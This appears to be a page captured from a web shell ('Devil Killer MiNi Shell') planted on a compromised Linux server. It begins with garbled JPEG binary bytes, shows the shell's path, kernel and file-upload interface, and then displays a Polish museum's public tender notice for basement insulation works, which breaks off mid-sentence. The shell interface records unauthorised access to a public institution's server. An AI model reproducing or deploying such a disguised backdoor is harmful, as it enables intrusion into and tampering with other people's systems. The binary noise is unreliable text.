JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250506/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250506/0021791701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie izolacji i ocieplenia ścian piwnic w siedzibie Muzeum </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Okręgowe Ziemi Kaliskiej w Kaliszu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000639512</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kalisz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">625013484</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@muzeumwkaliszu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.muzeumwkaliszu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie izolacji i ocieplenia ścian piwnic w siedzibie Muzeum </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-64c57b40-f547-41af-8ffc-6224b42ab390</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00217917</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00122586/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wykonanie izolacji i ocieplenia ścian piwnic w siedzibie muzeum</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-64c57b40-f547-41af-8ffc-6224b42ab390 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, tj.: pocztą elektroniczną na adres e-mail: biuro@muzeumwkaliszu.pl Ofertę, a także oświadczenie, o którym mowa w art. 125 ust. 1 Pzp, składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy w formie elektronicznej, lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Komunikacja ustna dopuszczalna jest wyłącznie w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia, ofert, o ile jej treść jest udokumentowana (wymagana jest pisemna notatka z ustnej rozmowy). Zamawiający nie przewiduje komunikowania się Zamawiającego z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej w przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69 Pzp.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się drogą elektroniczną przy użyciu https://ezamowienia.gov.pl/pl/ i poczty elektronicznej adres e-mail: biuro@muzeumwkaliszu.pl Złożenie oferty jest możliwe wyłącznie na Platformie e-zamówienia zgodnie z instrukcją zamieszczoną na stronie https://ezamowienia.gov.pl/pl/z uwzględnieniem zdania kolejnego. Uwaga: Zamawiający nie korzysta z formularza ofertowego interaktywnego generowanego przez Platformę e-Zamówienia. W zakładce „Złóż ofertę” w polu „Wypełniony formularz oferty” Wykonawca dodaje plik stanowiący załącznik nr 2 do SWZ (Formularz Ofertowy). W przypadku pojawienia się komunikatu Czy chcesz kontynuować? Postępowanie nie posiada opublikowanego formularza do tego postępowania. Plik XYZ nie jest poprawnym formularzem interaktywnym wygenerowanym na Platformie” należy kliknąć przycisk Tak, chcę kontynuować”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, zamawiający informuje, że: administratorem Pani/Pana danych osobowych jest Muzeum Okręgowe Ziemi Kaliskiej w Kaliszu, tel. 62 757 16 08; inspektorem ochrony danych osobowych jest Pani Joanna Hofman, tel. 62 757-16-08; Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego w formule „zaprojektuj i wybuduj” pn. „Wykonanie izolacji i ocieplenia ścian piwnic w siedzibie Muzeum”, nr sprawy 2-TP-2025, prowadzonym w trybie podstawowym bez negocjacji (art. 275 pkt. 1 Ustawy z dnia 11 września 2019 r. Pzp), odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych zwana dalej „ustawą”; Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy; w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan: na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO , prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. Nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych, prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. Nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych, prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2-TP-2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje wykonanie robót budowlanych w formule „zaprojektuj i wybuduj”. Przedmiot zamówienia należy wykonać na podstawie załączonego do SWZ Programu Funkcjonalno-Użytkowego. Przedmiotem zamówienia jest:<br/>a) opracowanie dokumentacji projektowo-kosztorysowej branży budowlanej (architektura, konstrukcja), sanitarnej i elektrycznej,<br/>b) uzyskanie niezbędnych opinii, zgód i pozwoleń na realizację prac,<br/>c) zorganizowanie placu budowy i jego zabezpieczenie,<br/>d) wykonanie zewnętrznych robót budowlanych polegających na:<br/>• wykonaniu pionowej izolacji przeciwwilgociowej i termicznej ścian piwnic od strony wschodniej oraz północnej,<br/>• wykonaniu drenażu odwadniającego wzdłuż ścian piwnic od strony wschodniej, północnej oraz części ściany południowej,<br/>• przyłączeniu drenażu do publicznej sieci kanalizacji deszczowej z wykonaniem przepompowni,<br/>• zainstalowaniu pompy pływakowej w podszybiu windy z podłączeniem odpływu do drenażu odwadniającego,<br/>• wykonanie zewnętrznej instalacji kanalizacji sanitarnej dla umywalki,<br/>• wykonanie podziemnego oraz naściennego odcinka kanału nawiewnego z czerpnią powietrza,<br/>e) wykonaniu wewnętrznych robót budowlanych polegających na: • wykonaniu otworu i zainstalowaniu drzwi wejściowych do pomieszczenia nr 0.10,<br/>• budowa i wykończenie ścian działowych dzielących pomieszczenie nr 0.10 na dwie części,<br/>• remont ścian pomieszczenia nr 0.10,<br/>• dostarczeniu i zainstalowaniu zlewozmywaka dwukomorowego oraz przepływowego podgrzewacza wody z przyłączeniem do kanalizacji sanitarnej i instalacji wodociągowej,<br/>• wykonaniu instalacji wentylacji nawiewnej i wyciągowej do obu części podzielonego pomieszczenia nr 0.10,<br/>• wykonanie wentylacji wyciągowej z dygestorium,<br/>• przebudowie instalacji wodociągowej w pomieszczeniach nr 0.05 i 0.09,<br/>• instalacji zestawu gniazd elektrycznych na filarze w pomieszczeniu nr 0.10.<br/>f) Przygotowanie dokumentacji powykonawczej, w tym instrukcji obsługi i eksploatacji wbudowanych urządzeń, protokołów niezbędnych pomiarów instalacji wentylacji i elektrycznej, geodezyjnej inwentaryzacji powykonawczej,<br/>g) Przeprowadzenie odbiorów końcowych,<br/>h) Obowiązkiem Wykonawcy będzie przekazanie kserokopii poświadczonej za zgodność z oryginałem Porozumienia najpóźniej do dnia, w którym nastąpi naruszenie struktury wykonanej przez PBD S.A. w Kaliszu.<br/>Zaprojektowane i realizowane roboty muszą być zgodne z postanowieniami i warunkami zawartymi w:<br/>a) Uchwałą nr LIII/719/2018 w sprawie ustanowienia na obszarze rewitalizacji Miasta Kalisza Specjalnej Strefy Rewitalizacji,<br/>b) Warunkami technicznymi przyłączenia do sieci deszczowej nr 228/2024 z dnia 5.09.2024 wydane przez Przedsiębiorstwo Wodociągów i Kanalizacji sp. z o.o.<br/>c) Pismem Dyrektora Zarządu Dróg Miejskich w Kaliszu nr WI.442.7.34.2015 z dnia 17.09.2024 określające warunki wykonania przyłączenia drenażu do sieci kanalizacji deszczowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">45212350-4 - Budynki o szczególnej wartości historycznej lub architektonicznej</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria wyboru oferty najkorzystniejszej:<br/>Kryterium nr 1: Cena - waga kryterium: 60<br/>Do porównania ofert Zamawiający przyjmuje ceny ofert z podatkiem VAT (kwota brutto). Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone na podstawie art. 226 ust. 1 Pzp. <br/>Kryterium nr 1 Sposób obliczania punktacji za cenę oferty<br/>Punktacja obliczana będzie według następującego wzoru:<br/><br/>cena brutto najtańszej oferty<br/>---------------------------------- X waga kryterium<br/>cena brutto badanej oferty<br/><br/>Do oceny przyjmuje się cenę oferty brutto (z podatkiem VAT).<br/>W kryterium nr 1 można uzyskać max. 60,00 pkt.<br/>Kryterium nr 2: Gwarancja i rękojmia - waga kryterium: 40 (nie mniej niż 36 miesięcy, max. 72 miesiące).<br/>W zakres kryterium nr 2 nie wchodzi objęcie gwarancją prac obejmujących odcinek ul. Kościuszki, na którym będą wykonywane prace branży drogowej (odtworzenie nawierzchni chodnika, pasa zieleni) oraz sanitarnej (włączenie do kanału deszczowego).<br/>Punktacja obliczana będzie według następujących zasad:<br/>Minimalny okres gwarancji i rękojmi wynosić musi 36 miesięcy (3 lata). Maksymalny badany okres gwarancji to 72 miesiące (6 lat). W przypadku, gdy Wykonawca zaoferuje okres gwarancji większy niż 72 miesiące, wówczas do badania będzie wzięty pod uwagę maksymalny możliwy okres gwarancji, tj. 72 miesiące.<br/>W powyższym kryterium oceniany będzie okres gwarancji jakości i rozszerzonej rękojmi za wady podany przez Wykonawcę w „Formularzu oferty”. Ofercie zostaną przyznane punkty w zależności od długości podanego przez Wykonawcę okresu gwarancji jakości i rozszerzonej rękojmi za wady (w miesiącach). Punktacja obliczana będzie według następującego wzoru:<br/><br/>Ilość miesięcy gwarancji podana w badanej ofercie<br/>-------------------------------------------------------------- X waga kryterium<br/>Ilość miesięcy max. gwarancji<br/><br/>Dla przykładu: Gwarancja określona w badanej ofercie wynosi 60 miesięcy. Maksymalna gwarancja wzięta pod uwagę przy badaniu ofert to 72 miesiące. Punktację dla badanej oferty wylicza się w sposób następujący:<br/><br/>60 miesięcy<br/>---------------- x 40 punktów = 0,8334 x 40 punktów = 33,336 pkt. ~ 33,34 pkt.<br/>72 miesiące<br/><br/>Punkty zostaną przyznane tylko wtedy, gdy Wykonawca w sposób jednoznaczny wskaże w „Formularzu oferty” ilość miesięcy, w innym przypadku oferta otrzyma zero punktów w tym kryterium (Zamawiający przyjmie, że Wykonawca zaproponował minimalną wartość).<br/>Pozostawienie pustego miejsca w „Formularzu oferty” uważa się za zaoferowanie 3-letniego okresu gwarancji jakości i rozszerzonej rękojmi za wady i brakiem punktów w powyższym kryterium.<br/>Wpisanie nieczytelnej wartości w „Formularzu oferty” uważa się za zaoferowanie 3-letniego okresu gwarancji jakości i rozszerzonej rękojmi za wady i brakiem punktów w powyższym kryterium.<br/>UWAGA:<br/>Zaoferowanie krótszego niż 3-letni okres gwarancji i rozszerzonej rękojmi za wady skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy, jako niezgodnej z treścią SWZ w ramach kryterium nr 2.<br/>Wykonawca może uzyskać maksymalnie 40,00 pkt<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów Kryterium nr 1 + Kryterium nr 2. Oferty zostaną ocenione przez Zamawiającego w skali od 0,00 do 100,00 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>a) spełniają warunki udziału w postępowaniu określone w pkt. 5.3 SWZ.<br/>b) nie podlegają wykluczeniu na podstawie art. 108 ust. 1 pkt. 1) – 6), art. 109 ust. 1 pkt 1, 4, 5, 7, 8, 9, 10 Ustawy Pzp,<br/>c) nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, na czas<br/>trwania tych okoliczności (t.j. Dz. U. z 2024 r. poz. 507),<br/>d) złożyli ofertę niepodlegającą odrzuceniu na podstawie art. 226 ust. 1 UPzp.<br/>W zakresie sytuacji ekonomicznej lub finansowej – o udzielenie zamówienia może ubiegać się Wykonawca, który wykaże,<br/>że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną co najmniej 250 000,00 zł<br/>W zakresie zdolności technicznej lub zawodowej – udzielenie zamówienia może ubiegać się Wykonawca, który wykaże, że:<br/>a) posiada wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj. w okresie ostatnich pięciu lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał: należycie co<br/>najmniej 2 roboty budowlano-remontowe na obiekcie zabytkowym, o łącznej wartości przynajmniej 250.000,00 PLN brutto,<br/>b) dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi:<br/>• uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej i pełnić będzie funkcję projektanta w<br/>wyżej wymienionej specjalności,<br/>• uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych i pełnić będzie funkcję projektanta w wyżej wymienionej<br/>specjalności,<br/>• uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych i pełnić będzie funkcję projektanta w wyżej wymienionej specjalności,<br/>• uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej i pełnić będzie funkcję projektanta w wyżej<br/>wymienionej specjalności,<br/>• uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych i pełnić będzie funkcję kierownika budowy/robót w<br/>wyżej wymienionej specjalności,<br/>• uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych i pełnić będzie funkcję kierownika budowy/robót w wyżej wymienionej specjalności,<br/>• uprawnienia budowlane do kierowania robotami w specjalności inżynieryjnej drogowej i pełnić będzie funkcję kierownika<br/>budowy/robót w wyżej 